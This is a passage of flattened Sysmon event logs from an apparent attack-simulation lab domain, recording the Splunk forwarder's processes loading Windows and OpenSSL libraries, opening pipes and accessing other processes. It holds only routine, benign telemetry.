19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605637Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605636Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605635Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605634Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605633Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605632Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605631Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605630Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605629Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605628Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605627Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605626Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605625Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605624Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001605623Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605622Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605621Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605620Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605619Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001605618Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605617Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605616Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.346{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605615Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:30.346{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605614Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:30.346{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605613Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:30.346{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605612Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:30.346{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605611Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:30.346{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605610Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:30.346{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001605609Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.267{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605608Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.267{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D80FC4122676C08F99046EE857BD090,SHA256=D2CAE073E064C1F89B3BBF841796D8604C3EA888BD65E80FECEA039B64BFCB11falsefalse - insufficient disk space 10341000x80000000000000001094911Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:30.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094910Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:30.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094917Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:31.639{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D0A4F2880E7F40528B27CA0047E0AC6,SHA256=4D883B95EDF466EC61F81CCE9D57FA908556167640D6D80153D605A25180385A,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001605787Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.856{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001605786Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.856{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001605785Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.856{21761711-7A4B-6080-BE60-00000000BB01}75885456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605784Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.856{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605783Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.856{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001605782Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605781Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605780Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605779Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001605778Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605777Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001605776Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605775Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605774Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605773Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605772Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605771Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605770Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605769Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605768Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program 